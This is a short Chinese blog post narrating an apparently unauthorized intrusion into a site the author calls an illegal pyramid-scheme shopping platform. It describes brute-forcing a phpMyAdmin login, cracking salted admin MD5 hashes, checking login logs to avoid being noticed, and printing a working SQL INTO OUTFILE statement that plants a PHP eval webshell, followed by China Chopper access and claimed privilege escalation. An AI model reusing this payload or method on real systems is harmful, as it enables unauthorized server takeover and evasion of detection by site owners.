针对某传销购物网的一次渗透测试
2018-01-18 00:00
471 查看
事件从无意爆破出一个phpmyadmin账号开始
打开了数据库看了一眼感觉是个非法网站
打开ip一看,果然是,
附上首页截图
既然是非法网站就要搞一搞了
然后从开始翻翻数据库
找到了管理员用户名密码
然后尝试各种md5解密,
成功在几个网站试过之后得到了明文,附图
几个md5解密网站尝试之后
把这几个管理员的md5密文分别在不同解密网站尝试之后得到了admin账号的明文,
竟然是TPSHOPadmin888
接下来就是查找有没有管理员登陆日志,防止自己登陆之后被发现,
然后翻数据库,发现了这个,就是在这里记录的登陆日志了
然后按照这个去后台登陆,
然而,无论怎么试,都是登陆错误,这就很郁闷了。。。
:
最后想到,先注册一个普通账号,再解密一下普通账号的密码,看看是不是有哪里不对,
然后主页点登陆,登陆页面点注册,随意注册了一个账号,密码adminadmin,然后到数据库里找到对应账号的密文,拿去解密
发现,,密码前边多了TPSHOP,
原来后台密码就是admin888,【老鸟一般看MD5就知道是admin888了
原谅我是一个小小鸟i】
赶紧尝试一波。
成功登陆
最后找到了网站的绝对路径 php 写入一句话
用到的一句话:select '<?php @eval($_POST[q])?>'INTO OUTFILE 'D:/phpStudy/WWW/meker.php'
写入成功后 那还说啥了 ? 上菜刀
拿下服务器 提权成功
排版不好 新手瞎搞 老鸟请飞过。。。
你会喜欢
挖掘利器Andro Tickler:安卓应用渗透测试和审核工具箱
渗透测试一条龙,针对指定站点思路
全能无线渗透测试工具,一个LAZY就搞定了
相关文章推荐
- 记一次内网渗透测试经历
- 一次图文并茂的渗透完整测试 推荐
- 记一次渗透测试小实验
- 老外一次渗透测试报告
- 对某公司一次渗透测试
- 一次渗透测试的过程
- 渗透测试基本流程(针对工作中的渗透测试)
- 通过mysql对淮北生活通网站的一次渗透测试
- 对Linux服务器的一次渗透测试过程
- 一次测试岗位针对Java和接口的面试题
- NetRipper - 针对渗透测试人员的智能流量嗅探
- 记一次网吧渗透测试
- 一次渗透测试过程--从外网进内网(原创)
- 一次针对国产化办公自动化系统的疲劳测试缺陷分析
- 一次图文并茂的渗透完整测试
- [安全测试报告]针对某厂商的一次渗透性测试
- 一次完整的安全渗透测试
- 记一次简单的渗透测试经过
- 记一次渗透测试实战
- 一次完整的安全渗透测试